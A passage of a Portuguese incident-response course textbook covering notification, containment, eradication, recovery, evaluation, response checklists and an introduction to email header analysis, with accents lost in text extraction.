q Os elementos bsicos de uma notifcao de incidente tipicamente compreende:
1 Informaes bsicas: descrio do incidente, incluindo o tipo do ataque identifcado,
motivao aparente do ataque, Sistema Operacional ou servio afetado pelo inci-
dente, possvel origem do ataque e horrio;
1 Informaes especfcas do ataque: verso do servio ou sistema comprometido,
fragmento do log que descreve o ataque em si, protocolo utilizado no ataque e vulne-
rabilidade explorada;
1 Consequncias: todas as consequncias do ataque identifcadas e possveis ameaas,
tendo em vista o grau de comprometimento do incidente. Por exemplo, o atacante
obteve acesso privilegiado a um servidor de banco de dados da empresa. Embora no
se tenha identifcado o acesso base de dados, esta pode ter sido copiada;
1 Status: situao atual do incidente, incluindo aes realizadas nos servios
e sistemas comprometidos.
Alm dessas informaes, outros dados podem complementar a notifcao. Uma noti-
fcao bem detalhada auxilia na investigao e resoluo do incidente. Cabe lembrar,
entretanto, que nem sempre todas as partes envolvidas necessitam saber os detalhes do
incidente, sobretudo entidades externas instituio. Em alguns casos, podem-se utilizar
notifcaes com diferentes nveis de detalhamento, tendo em vista o pblico-alvo.
Conteno
q A etapa de conteno tem por objetivo limitar ou atenuar os danos causados por um
incidente de segurana previamente detectado.
Com a implementao de medidas de conteno deseja-se evitar que um dado incidente afete
os demais recursos da instituio ou, ainda, impea o funcionamento de servios crticos.
q Do contrrio, caso as aes de conteno no sejam implementadas, um atacante pode:
1 Obter controle de aplicaes ou novos sistemas na rede local;
1 Remover dados do sistema de arquivos: remover evidncias dos logs ou ainda obter
informaes sensveis e valiosas para a instituio;
1 Lanar ataques externos destinados a outras instituies ou, at mesmo, conectar a
um controlador de botnet.
A conteno deve fornecer uma soluo de segurana razovel at que informaes
sufcientes sejam obtidas para a resoluo do incidente de maneira defnitiva.
Afnal, nem sempre possvel ter viso precisa do incidente no instante seguinte em
que detectado.
q
Aes de conteno geralmente so realizadas de forma rpida e de maneira paliativa.
Mesmo assim, tais aes no devem ser subestimadas. Existem incidentes que podem sair
do controle facilmente, como a propagao de um worm em uma instituio. No emblem-
tico caso do worm Slammer, o malware infectou 90% das mquinas vulnerveis na internet
nos primeiros dez minutos de atuao.
Diferentes aes podem ser realizadas para diminuir os danos de um incidente. Nem
sempre a soluo mais simples, como desligar um computador comprometido, a maneira
correta de limitar os dados de um comprometimento. Certos comprometimentos valem-se
de armadilhas lgicas, por exemplo: assim que um sistema for desligado, um conjunto
69

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
de funes ativado, tal como: remover todos os rastros do comprometimento ou ainda,
remover arquivos essenciais para a execuo do Sistema Operacional.
Pode-se concluir que a parte essencial da conteno a tomada de deciso, ou seja, defnir
efetivamente que aes devem ser realizadas para conter o incidente.
q A seguir so exemplifcadas algumas aes de conteno:
1 Desconectar o sistema comprometido ou isolar a rede afetada. Em alguns casos,
mesmo com o sistema comprometido, necessrio manter o sistema comprome-
tido ativo. Como soluo temporria, pode-se isolar o sistema da rede. Dessa forma,
o sistema continua acessvel, mas apenas com acesso local, evitando que outras
mquinas sejam comprometidas;
1 Desativar sistema , em casos especfcos, uma soluo aconselhvel para evitar
maiores perdas. Em um caso onde um sistema comprometido est tendo o sistema
de arquivo removido, por exemplo, o desligamento do sistema evitar que o processo
de formatao seja completo;
1 Alterar polticas de roteamento dos equipamentos de redes de maneira a bloquear o
fuxo previamente identifcado como malicioso;
1 Desabilitar servios vulnerveis essencial para certos tipos de ataques. Dessa
maneira, em casos onde um ataque explora servios especfcos, a desativao do
servio atacado inibe o comprometimento de outros sistemas;
1 Bloquear padres de trfego usando ferramentas de restrio. Esse bloqueio s pode
ser efetuado quando um padro de trfego que caracteriza o evento de segurana
investigado assinatura mapeado.
A conteno uma tarefa que pode ser incremental. Com a investigao do incidente,
novos sistemas afetados podem necessitar de medidas que possam conter possveis
aes do invasor.
Evidentemente, cada incidente tem as suas particularidades. Cada caso demanda aes
onde o CSIRT defne estratgias de conteno. Nas etapas iniciais de um incidente as
informaes so imprecisas e existem certas presses para que o incidente seja resolvido
rapidamente e pare de afetar os sistemas da instituio. Se por um lado desativar um
sistema comprometido pode parecer a ao mais sensata, por outro deixar o sistema ativo e
identifcar o intruso pode ser mais interessante.
q Qualquer ao de conteno ou mitigao nos sistemas comprometidos podem ter
efeitos indesejados, tal como destruir evidncias ou fazer com que o atacante perceba
que ele foi identifcado fazendo com que determinadas aes sejam lanadas (apagar
todos os arquivos).
Logo, mesmo na fase de conteno, recomenda-se que sejam coletados, na medida do pos-
svel, todos os dados pertinentes para a investigao antes mesmo que as aes de conteno
sejam realizadas. Afnal, pode ser que o acesso ao sistema comprometido torne-se invivel.
Por fm, a fase de conteno deve ser devidamente documentada para que os procedi-
mentos possam ser revertidos posteriormente; afnal, na sua maioria, so aes tempo-
rrias. No menos importante comunicar aos usurios e partes envolvidas o real status
do sistema comprometido, descrevendo os procedimentos realizados at o momento para
a conteno dos ataques. Do contrrio, as partes dependentes do servio comprometido
podem ser informadas de forma direta sem que rumores sejam disseminados.
No caso especfco da
propagao de um
malware, por exemplo,
pode-se eliminar o
vetor de ataque
utilizado pelo malware.
Outra possvel ao
isolar os sistemas
comprometidos em
nvel de rede, impe-
dindo que o worm
alastre-se para outras
sub-redes.
l
70

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Erradicao
q O objetivo da etapa de erradicao eliminar a causa do incidente. Deseja-se remover
a fragilidade de segurana utilizada para comprometer os sistemas relacionados com o
incidente de segurana.
Todas as ameaas e riscos devem ser removidos do sistema e redes afetadas antes que o
servio seja reestabelecido.
Do contrrio, o sistema pode ser facilmente comprometido novamente. Em alguns casos;
no entanto, apenas remover a causa do incidente pode no ser efetiva para que o sistema
possa ser recuperado.
q
As aes especfcas de erradicao dependem da natureza do incidente.
Em sistemas onde uma vulnerabilidade de uma aplicao foi explorada para comprometer
o sistema, podem ser utilizadas aes como: atualizar a aplicao comprometida; instalar as
ltimas correes de segurana; restaurar os dados dos usurios; usar sistemas de antivrus
e remoo de malware.
q Como resultado, essa etapa deve:
1 Garantir que as causas do incidente foram removidas, assim como todas as atividades
e arquivos associados ao incidente;
1 Assegurar a remoo de todos os mtodos de acesso utilizado pelo atacante, incluindo:
novas contas de acessos; backdoors e, se aplicvel, acesso fsico ao sistema comprometido.
Da mesma forma, a erradicao deve considerar as aes de conteno realizadas pre-
viamente pela equipe, tal como bloqueios e restrio de acesso aos sistemas.
Algumas vezes, a erradicao completa do incidente no pode ser realizada e as medidas de
conteno devem ser mantidas at que a soluo seja efetivada. Por exemplo, uma vulnera-
bilidade sem correo disponibilizada pelo fabricante.
Por fm, recomenda-se que o CSIRT tenha procedimentos estabelecidos para atuar com os
casos de erradicao de incidentes conhecidos e frequentemente resolvidos pela equipe.
Dessa maneira, evita-se com que tarefas sejam esquecidas durante o processo.
Recuperao
q A recuperao tem o objetivo de retornar qualquer sistema comprometido completa-
mente ao seu estado normal de operao. Essa etapa inclui retornar ao estado opera-
cional das redes afetadas, e tambm restaurar os dados de aplicaes e de usurios, alm
da integridade do sistema. Os principais objetivos do estgio de recuperao incluem:
1 Restaurar a integridade do sistema;
1 Garantir que o sistema foi recuperado corretamente e que suas funcionalidades
estejam ativas;
1 Implementar medidas de segurana para evitar novos comprometimentos.
O processo de recuperao de um incidente de segurana determinado pelas prprias
caractersticas do ataque efetuado.
Em certos casos, a recuperao pode ser realizada logo aps remover as causas do inci-
dente; em outros, porm, necessrio reconstruir o sistema como um todo. Neste contexto,
garantir a integridade do sistema essencial.
71

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
Em sistemas comprometidos no se deve confar na integridade dos arquivos, pois estes
podem ter sidos substitudos por arquivos maliciosos. Isso inclui comandos bsicos de
sistema, tal como, ls, md5sum, ps e determinadas chamadas de sistemas. Sendo assim,
a integridade dos sistemas deve ser verifcada utilizando ferramentas externas ao prprio
sistema. Caso no seja possvel garantir a integridade, recomenda-se a reinstalao do
Sistema Operacional, usando verses confveis.
Alm de garantir a integridade do sistema, deve-se atentar para a restaurao dos dados do
sistema, tal como dados de usurios, confguraes de servios e demais arquivos.
q A restaurao de dados dos sistemas comprometidos pode ser realizada usando o
ltimo backup completo armazenado. Outra maneira utilizar sistemas tolerantes a
falha, como discos rgidos espelhados ou demais sistemas de RAID. Deve-se, no entanto,
assegurar-se de que os dados utilizados para a restaurao do sistema estejam ntegros
e no tenham sido comprometidos.
Um erro comum reinstalar aplicaes e fazer com que o sistema seja restaurado com a
mesma aplicao vulnervel que levou ao comprometimento. Portanto, devemos estar
seguros de que as medidas corretivas foram aplicadas corretamente de maneira a impedir
que o incidente volte a se repedir.
q Aps a restaurao dos sistemas, preciso se certifcar de que os servios estejam fun-
cionando de maneira correta.
Isso inclui verifcar os servios providos e a existncia de alguma restrio de acesso. Em
certos incidentes, o servio comprometido pode estar listado em listas de bloqueio externas
(blacklist). Isso muito comum em sistemas que so comprometidos e utilizados para envio
de spam. Sendo assim, faz parte do processo verifcar a existncia de algum fltro externo e
providenciar a remoo.
q Adicionalmente, algumas consideraes devem ser endereadas a fm de realizar com
sucesso o estgio de recuperao de sistemas:
1 Comunicar as pessoas envolvidas sobre o estado da restaurao do sistema e prover
orientao na eventual deteco de anormalidades;
1 Continuar a monitorao das atividades do sistema em busca de possveis anomalias,
o que pode representar o retorno do comprometimento;
1 Atualizar os demais sistemas comprometidos incluindo correo de vulnerabilidades
e tambm atualizar as defesas de segurana com novas regras que evitem nova-
mente o ataque sofrido.
Como comentado, tipicamente o CSIRT possui os seus prprios procedimentos implemen-
tados para a restaurao dos sistemas.
q A ttulo de exemplo, uma pequena rotina descrita a seguir, de maneira a ilustrar os
conceitos dessa etapa de recuperao:
1 Remover vulnerabilidades, instalar correes e demais atualizaes necessrias;
1 Reinstalar verses confveis de Sistemas Operacionais;
1 Reinstalar backup de dados;
1 Trocar todas as credenciais de acessos do sistema;
1 Conduzir o teste de vulnerabilidade no sistema comprometido;
72

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Reconectar o sistema na rede;
1 Monitor as atividades do sistema com alto nvel de detalhes;
1 Documentar o procedimento de recuperao para possveis auditorias e avaliaes.
Portanto, a etapa de soluo de um incidente consiste em mitigar as causas, levando-se em
considerao todas as informaes obtidas durante as etapas anteriores. Na medida do
possvel e do aplicvel, o processo de erradicao deve considerar propostas de melhorias
que visem a diminuir a exposio a novos incidentes como o que foi tratado.
q Finalmente, durante a recuperao dos sistemas, importante remover todas as
medidas defensivas utilizadas, em especial passando novamente pelas aes realizadas
na etapa de conteno do incidente.
Deve-se ajustar, por exemplo, fltros aplicados aos sistemas e em equipamentos de infraes-
trutura de rede envolvidos.
Avaliao
q Por fm, a avaliao a etapa que consiste em revisar e integrar todas as informaes
relacionadas com o incidente ocorrido. A avaliao do incidente passa por reconstituir
suas etapas, realizando uma anlise aps a resoluo do incidente. As atividades de
avaliao visam:
1 Caracterizar o conjunto de lies aprendidas de modo a aprimorar os procedimentos
e processos existentes;
1 Prover estatsticas e mtricas relativas ao processo de resposta a incidentes;
1 Identifcar caractersticas de incidentes que podem ser utilizadas para treinar novos
membros da equipe;
1 Obter informaes que podem ser utilizadas em processos legais.
Infelizmente, muitas vezes, esse estgio negligenciado devido a fatores como esgotamento da
equipe (cansao ou falta de recursos). No entanto, a etapa de avaliao igualmente importante
e no deve ser omitida do processo de resposta de incidentes. Nesse contexto, a avaliao de
incidentes passa por reconstituir suas etapas, realizando uma anlise post-mortem. Defnir, por
exemplo, quais foram os estgios de comprometimento; que tipo de informao foi acessada;
quais informaes poderiam ter sido acessadas; onde o incidente poderia ter sido detectado; e
se as novas medidas implementadas seriam efetivas para novos incidentes da mesma natureza.
q Outra importante parte do estgio de avaliao prover a atualizao de possveis
modifcaes nos procedimentos utilizados pelo CSIRT, tendo em base as lies apren-
didas pelo incidente fnalizado.
Possivelmente a equipe que atuou nos estgios prvios do processo de resposta a incidente
identifcou etapas dos procedimentos utilizados que podem ser aprimorados. Certas etapas
podem ser melhoradas ou, at mesmo, suprimidas de maneira a deixar o procedimento de
resposta mais objetivo.
q Por fm, e no mesmo importante, avaliar como decorreu a interao entre as pessoas do
CSIRT e tambm a comunicao com outras partes envolvidas com o incidente. Nesse estgio
de avaliao, aspectos da comunicao interpessoal tambm podem ser melhorados.
Da mesma forma, deve-se avaliar a conduo gerencial da equipe no momento da resposta
a incidentes, permitindo identifcar possveis limitaes.
73

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
Recursos adicionais
Como comentado, as etapas da metodologia citada servem como guia para a implementao
de procedimentos e aes a serem implementados pelos CSIRTs. importante lembrar que
no existe um procedimento ou conjunto de aes padronizadas para lidar com incidentes de
segurana. Todas as aes do CSIRT devem seguir a misso e a abrangncia operacional tendo
em vista as polticas de cada instituio. Na sequncia so apresentados alguns exemplos de
procedimentos de maneira a ilustrar os conceitos discutidos at ento.
q Os seguintes procedimentos so apresentados:
1 Roteiro para avaliao inicial de um incidente de segurana;
1 Roteiros para atuar com os seguintes tipos de incidentes:
2 Comprometimento por worm;
2 Pgina falsa.
Roteiro para avaliao inicial de um incidente
Utilizando a metodologia recm-descrita, possvel desenvolver um roteiro ou um checklist
que pode ser til para rapidamente avaliar e obter informaes sobre o incidente. Mesmo no
disponibilizando a resposta de todos os tipos de incidentes, o checklist pode ser utilizado para
auxiliar o CSIRT nas fases iniciais de resposta a incidentes. O checklist a seguir foi embasado
no modelo proposto por Eugene Shultz e Russell Shumway (vide bibliografa deste captulo).
Roteiro para avaliao de incidentes de segurana
q 1. Qual a natureza do incidente?
[ ] Negao de servios (DoS)
[ ] Comprometimento de sistemas
[ ] Cdigos maliciosos
[ ] Acesso no autorizado
[ ] Outros
2. O incidente afetou ou comprometeu dados sensveis da instituio, como, por exemplo,
base de clientes, credenciais de acesso, sistemas crticos?
[ ] Sim
[ ] No
3. O atacante obteve acesso privilegiado (root ou administrador)?
[ ] Sim
[ ] No
Quando o incidente foi detectado?
Data:
Hora:
4. Como o incidente foi detectado?
[ ] Auditoria de Logs ou sistemas de deteco de intruso
[ ] Notifcao externa
[ ] Software de antivrus
[ ] Usurios internos
[ ] Outros
74

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 5. Quando o incidente de fato ocorreu?
Data:
Hora:
6. O incidente continua?
[ ] Sim
[ ] No
7. Quais so os sintomas atuais relativos ao incidente?
8. Que departamentos/reas foram afetados?
9. Que sistemas foram afetados?
Descreva em detalhes caractersticas dos sistemas afetados, incluindo Sistema Opera-
cional, aplicaes, endereo IP e usurio relacionado com o dispositivo ou aplicao.
10. O backup dos sistemas comprometidos est disponvel?
[ ] Sim
[ ] No
11. Os sistemas afetados ainda esto sob risco de ataques?
[ ] Sim
[ ] No
12. Considere desconectar o sistema ou desativar as contas de usurios comprometidas
nos sistemas afetados.
Os sistemas comprometidos potencialmente necessitaram de uma anlise forense?
[ ] Sim
[ ] No
Considere cenrio onde seja necessrio obter mais informaes sobre o ataque ou ainda
seja necessria interao com a Justia.
Procedimentos
q Como comentado, cada CSIRT deve desenvolver os seus prprios procedimentos e
roteiros que identifcam as aes a serem executados na ocorrncia de um incidente.
75

C
a
p

t
u
l
o


4

-

P
r
o
c
e
s
s
o

d
e

t
r
a
t
a
m
e
n
t
o

d
e

i
n
c
i
d
e
n
t
e
s
Na sequncia so apresentados diferentes roteiros que podem servir como base para um
CSIRT desenvolver os seus prprios procedimentos.
Comprometimento por Malware/Worm
q 1. Isolar o sistema afetado
2 Desconectar o sistema afetado da rede ou pelo menos isolar os sistemas
comprometidos;
2 Registrar as aes realizadas (regras de frewall e demais bloqueios realizados).
2. Notifcar as autoridades responsveis
2 Notifcar o CSIRT;
2 Notifcar as autoridades departamentais.
3. Identifcar o problema
2 Determinar e isolar os processos e arquivos relativos ao incidente;
2 Coletar evidncias: logs, snapshot do sistema, confgurao etc.;
2 Listar a conexes de rede ativas;
2 Seguir os procedimentos especfcos de cada Sistema Operacional para localizar
arquivos modifcados, programas instalados ou arquivos ocultos.
4. Conter aes do comprometimento
2 Remover todo processo suspeito no sistema comprometido;
2 Assegurar-se de que o malware que comprometeu o sistema no ser includo no
backup;
2 Manter o sistema isolado at que o comprometimento seja totalmente erradicado.
5. Erradicar os sistemas afetados
2 Avaliar a extenso dos danos antes de aplicar a correo das vulnerabilidades;
2 Aplicar correes de segurana em todos os sistemas vulnerveis;
2 Avaliar o sistema em busca de demais danos causados pelo comprometimento;
2 Caso o sistema seja recuperado do backup, importante lembrar de apliar corre-
es de segurana;
6. Atualizar sistema de antivrus.
7. Restaurar os sistemas para o estado de operao normal
2 Assegurar-se de que os sistemas esto restaurando e executando em estado
normal de operao;
2 Alterar credenciais de acesso de todos os usurios.
8. Realizar uma avaliao
2 Realizar uma avaliao geral do caso, de maneira a avaliar as aes implementadas;
2 Atualizar os procedimentos internos com as lies aprendidas no caso.
Pgina falsa
q 1. Desativar a pgina falsa
2 Se possvel, desativar o servidor web comprometido;
2 Tornar o acesso pgina falsa inacessvel.
76

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 2. Identifcar as caractersticas do incidente
2 Identifcar como a pgina de phishing foi instalada;
2 Determinar outras aes desempenhadas no servidor comprometido;
2 Identifcar se o comprometimento ao sistema teve acesso privilegiado (super-usurio);
2 Analisar os arquivos relativos pgina comprometida (base de dados, arquivos do
atacante, ferramentas do atacante);
2 Identifcar todos os acessos pgina comprometida (possveis vtimas).
3. Notifcar as partes envolvidas
2 Notifcar as possveis vtimas do ataque;
2 Enviar artefatos e informaes sensveis encontradas na mquina para
a instituio fraudada;
2 Notifcar CSIRT de coordenao (CAIS/RNP ou CERT.br).
4. Restaurar os sistemas para o estado de operao normal
2 Assegurar-se de que os sistemas esto restaurando e executando em estado
normal de operao;
2 Alterar credenciais de acesso de todos os usurios;
2 Ajustar as medidas de segurana de modo a evitar novos comprometimentos;
2 Armazenar todos os arquivos relativos pgina comprometida para possveis
colaboraes com a Justia.
Leitura recomendada:
1 NIST SP 800-61: Computer Security Incident Handling Guide
http://csrc.nist.gov/publications/nistpubs/800-61/sp800-61.pdf
1 EDUCAUSE Security Task Force: Incident Handling and Response
http://www.educause.edu/IncidentHandlingandResponse/1269
1 Handbook for Computer Security Incident Response Teams
http://www.cert.org/archive/pdf/csirt-handbook.pdf
1 RFC 3.227 Guidelines for Evidence Collection and Archiving
http://www.ietf.org/rfc/rfc3227.txt
1 An Introduction to Incident Handling
http://www.securityfocus.com/infocus/1184
1 Handbook for Computer Security Incident Response Teams
http://www.cert.org/archive/pdf/csirt-handbook.pdf
1 CERT/CC Steps for Recovering from a UNIX or NT System Compromise
http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
1 Microsoft Says Recovery from Malware Becoming Impossible
http://www.eweek.com/article2/0,1895,1945808,00.asp
1 RFC 3.227: Guidelines for Evidence Collection and Archiving
http://www.ietf.org/rfc/rfc3227.txt
Schultz, Eugene, and Russell Shumway. Incident response: a strategic guide to handling
system and network security breaches. Sams, 2001.
Van Wyk, Kenneth R., and Richard Forno. Incident response. OReilly, 2001.
1 IODEF: Incident Object Description and Exchange Format
http://www.terena.nl/activities/tf-csirt/iodef/
77

C
a
p

t
u
l
o


4

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

4

Roteiro de atividades 4
Atividade 4.1 Notificao de incidentes
a. Ao reportar um incidente por e-mail, quais so as informaes mnimas necessrias para
serem enviadas na notifcao?
b. Discuta os motivos que levaram uma empresa a no reportar um incidente.
c. Discuta os motivos que levaram uma empresa a no responder a notifcao de um inci-
dente recebido.
d. Como responder uma intimao judicial internacional?
Atividade 4.2 Preparao
a. No processo de resposta a incidentes, algumas notifcaes so mais crticas que outras.
Da mesma forma, existem entidades que podem ter suas notifcaes priorizadas pelo
seu CSIRT. Voc considera importante priorizar incidentes de segurana de certas enti-
dades? Quais? Por qu?
78

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
b. Como encaminhar a situao adequadamente quando um membro do alto escalo da
empresa est infringindo a poltica de segurana da instituio? Por exemplo: acesso a
contedo pornogrfco em horrio de trabalho.
Atividade 4.3 Deteco
a. Como o seu CSIRT se prepara para detectar e prevenir incidentes internos? Por exemplo,
as ferramentas de deteco da instituio possuem fltros para identifcar acessos inde-
vidos aos seus sistemas tal como ataques de fora bruta?
b. Como atuar em notifcaes onde a origem dos pacotes foi forjada? Por exemplo, foi
realizado um ataque para a instituio X utilizando pacotes UDP. Os pacotes usados no
ataque da instituio X continham o endereamento de origem da sua instituio. Mesmo
sem qualquer relao com o ataque, o seu CSIRT recebe uma notifcao da instituio X
informando que est sofrendo um ataque. Como responder a esse tipo notifcao?
c. Atravs de uma pesquisa em sites pblicos (paste.bin), o seu CSIRT identifcou credenciais
de sua instituio aparentemente vlidas. No entanto, as informaes so muito antigas
credenciais de usurios que nem esto mais na instituio. O seu CSIRT iniciaria uma
investigao para apurar o caso?
Atividade 4.4 Conteno
a. Como conter um incidente em um servidor que no pode ser desligado por motivos ope-
racionais da empresa?
79

C
a
p

t
u
l
o


4

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

4

b. Sua instituio utiliza um software legado e crtico para o funcionamento da empresa.
Atravs de uma anlise, identifcou-se que a aplicao possui vulnerabilidades, e que
estas no podem ser corrigidas. Como proceder nesse caso, tendo em vista a etapa de
erradicao do processo de resposta a incidentes?
Atividade 4.5 Erradicao
a. Em que casos de comprometimento a reinstalao do sistema deve ser mandatria?
Atividade 4.6 Recuperao
a. No caso da necessidade de restaurar um backup, como garantir que o mesmo backup
no est comprometido ou vulnervel ao mesmo tipo de ataque?
Atividade 4.7 Monitorao de acessos
a. Considere o seguinte cenrio: um funcionrio est de frias e deixa o computador da
empresa de posse da famlia. Atravs do notebook, possvel acessar a rede da empresa
via VPN. Como isso pode ser tratado na poltica de acesso da sua instituio?
b. Funcionrios do departamento esto usando servidores de proxy abertos encontrados
na web para burlar a poltica de bloqueio da sua instituio. Quais so as implicaes de
usar um servio externo para acessar a rede?
80

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
c. O seu CSIRT recomenda a poltica mais severa para o uso recreativo da internet no trabalho?
Qual flosofa mais adequada: a) sem restrio de acesso, mas com alto nvel de logs
(permite tudo e registra tudo); b) rea restrita para uso recreativo (fumdromo da internet).
81

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
5
Aspectos operacionais da resposta
a incidentes

Identifcar informaes crticas em incidentes de segurana; Prover o entendimento
e escopo de incidentes; Interpretar notifcaes de incidentes.
Anlise de cabealhos de e-mails; Identifcao de informaes relevantes em
logs de servios e sistemas; Resposta, notifcao e encaminhamento de incidentes
de segurana.


Introduo
Sabe-se que o processo de resposta a incidentes constitudo por uma metodologia e
etapas bem defnidas. O captulo anterior apresentou uma viso geral do processo de res-
posta a incidentes de uma maneira organizacional. De forma complementar, este captulo
tem por objetivo apresentar as diferentes etapas sob o ponto de vista operacional. Para
isso, sero apresentadas ferramentas e tcnicas que servem para identifcar informaes
sensveis de incidentes e prover recursos para a resoluo.
Aspectos operacionais da resposta a incidente
q Os aspectos operacionais da resposta a incidentes descrevem de forma pragmtica como
as diferentes etapas da metodologia de resposta a incidente podem ser implementadas.

importante lembrar que existem diferentes processos e metodologias para lidar com os
incidentes de segurana cada CSIRT deve implementar sua metodologia conforme as suas
prprias peculiaridades: abrangncia operacional e poltica da instituio. Mesmo assim,
existe um conjunto de atividades que permeiam as diferentes metodologias e podem auxi-
liar o CSIRT em suas tarefas especializadas.
A identifcao de um incidente, por exemplo, uma tarefa presente em qualquer metodologia
de resposta a incidente. A partir do momento que um incidente de segurana identifcado,
cabe equipe defnir quais so as aes a serem desempenhadas pela equipe. Essas etapas
operacionais seguem um fuxo lgico bem defnido. A fgura a seguir ilustra as principais aes
que podem ser desempenhadas assim que um incidente de segurana identifcado.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
82

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
incidente
identicao
priorizar categorizar atribuir
triagem
q Inicialmente, assim que o CSIRT identifca um possvel incidente de segurana, entram
em ao etapas de classifcao e priorizao dos eventos.
Posteriormente, a equipe atribui os incidentes aos seus devidos responsveis para que os
devidos procedimentos sejam aplicados. Na sequncia as diferentes etapas da metodologia
so caracterizadas com maior nvel de detalhamento.
Identificao
q A identifcao visa confrmar a real existncia do incidente e realizar uma anlise inicial
dos recursos afetados. No que tange as questes operacionais, cabe relembrar as
diversas formas que um incidente pode ser identifcado:
1 Identifcada pelo prprio CSIRT;
1 Notifcada por entidades da prpria instituio;
1 Notifcao por entidades externas.
Para isso, o CSIRT usa a sua infraestrutura e recursos para identifcar os incidentes
de segurana.
Ferramentas de segurana do prprio CSIRT, por exemplo, podem ser utilizadas para
identifcar incidentes de segurana destinados instituio. As ferramentas de deteco de
intruso so teis para identifcar mquinas comprometidas na prpria rede local.
Da mesma forma, incidentes podem ser identifcados por outros departamentos atravs da
simples observao comportamental dos sistemas (lentido, muitas conexes, uso intenso
de disco rgido em ociosidade do sistema).
q Por outro lado, um incidente pode ser notifcado por meio de entidades externas, tal
como CSIRTs, redes atacadas, grupos de pesquisas.
Sendo assim, todo incidente de segurana deve ser analisado de forma criteriosa, com a
verifcao da origem e a veracidade das informaes reportadas. Como parte da avaliao,
no basta apenas examinar as informaes do corpo da mensagem da notifcao, mas em
alguns casos inspecionar seu cabealho.
Figura 5.1
Etapas operacionais
iniciais na anlise
de um incidente de
segurana.
83

C
a
p

t
u
l
o


5

-

A
s
p
e
c
t
o
s

o
p
e
r
a
c
i
o
n
a
i
s

d
a

r
e
s
p
o
s
t
a

a

i
n
c
i
d
e
n
t
e
s
Mensagens de e-mail
Como se sabe, o envio de mensagens realizado por um servidor de e-mail tipicamente
utilizando o protocolo Simple Mail Transfer Protocol (SMTP) para transmisso da mensagem
desejada. Em geral, os servidores SMTP servidor de e-mail da instituio permitem que
as mquinas da rede interna conectem e enviem mensagens. Para isso, os servidores de
e-mail podem ser confgurados de diferentes maneiras, usando polticas distintas para
a transmisso de mensagens. O ideal, por questes de segurana, que um servidor de
e-mail no deveria permitir a submisso direta de mensagens de e-mails de mquinas
internas sem garantir a autenticao dos usurios. Afnal, mquinas comprometidas
poderiam valer-se dessa relao de confana e usar o servidor da instituio para enviar
mensagens indesejadas.
As boas prticas de confgurao descrevem maneiras de confgurar de modo seguro os ser-
vidores de e-mail de uma instituio. Um exemplo a poltica de segurana que implementa
o Gerenciamento da porta 25.
q Antes de analisar mensagens de e-mail, importante relembrar a anatomia tpica de
uma mensagem. Uma mensagem de e-mails constituda por trs partes distintas:
1 Envelope: diretivas utilizadas para o efetivo encaminhamento da mensagem;
1 Cabealho: diretivas informacionais que descrevem propriedades da mensagem;
1 Corpo de mensagens: contedo da mensagem de e-mail.
O envelope determina onde a mensagem de e-mail efetivamente vai ser entregue. O enve-
lope invisvel ao usurio no fazendo parte da mensagem de e-mail. As informaes do
envelope so utilizadas internamente pelo protocolo de envio de mensagens (SMTP).
q De forma resumida, o protocolo SMTP necessita mandatoriamente dos seguintes campos:
1 mail from: <from@instituicao.com>
1 rcpt to: <to@gmail.com>
Os campos mail from: e rcpt to: so utilizados respectivamente para especifcar a origem
da mensagem e o destinatrio. Caso no seja possvel entregar a mensagem, a mesma
mensagem retornada para o endereo de origem. importante lembrar que as diretivas
do envelope da mensagem so totalmente independentes do cabealho. Sendo assim,
possvel ter a diretiva mail from: e a diretiva do cabealho From diferentes. Essa inconsis-
tncia entre o cabealho e o envelope uma tcnica bastante utilizada por fraudadores de
modo a forjar a origem das mensagens.
q J o cabealho da mensagem de e-mail constitudo por um conjunto de informaes
especifcadas na RFC 5322.
Tais diretivas descrevem informaes da mensagem, como: data e hora em que a mensagem
foi envida, servidores de e-mail intermedirios utilizados para enviar a mensagem e seus
respectivos horrios de recebimento. Por fm, o corpo da mensagem o contedo da men-
sagem propriamente dito. Tipicamente em formato texto sem formatao, mas pode conter
outros formatos, incluindo HTML, arquivos binrios (anexo) e tambm contedo cifrado.
Mais informaes
podem ser encontradas
em: http://www.
antispam.br/admin/
porta25/motivacao/
w
84

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Anlise de cabealho
q A anlise do cabealho de e-mail consiste em examinar certas informaes presentes
nas mensagens em busca de inconsistncias. As caractersticas de uma mensagem de
notifcao podem revelar:
1 Mensagens forjadas;
1 IP de origem do remetente;
1 Caractersticas do servidor de e-mail;
1 Erros de confgurao;
1 Sincronia de tempo.
O entendimento dos cabealhos de uma mensagem uma habilidade demandada para os
membros da equipe do CSIRT. O primeiro passo localizar o cabealho de uma mensagem
de e-mail. Muitos softwares ocultam parte das diretivas do cabealho apresentando apenas
algumas informaes, tal como: origem, destino, assunto e data, muito embora seja possvel
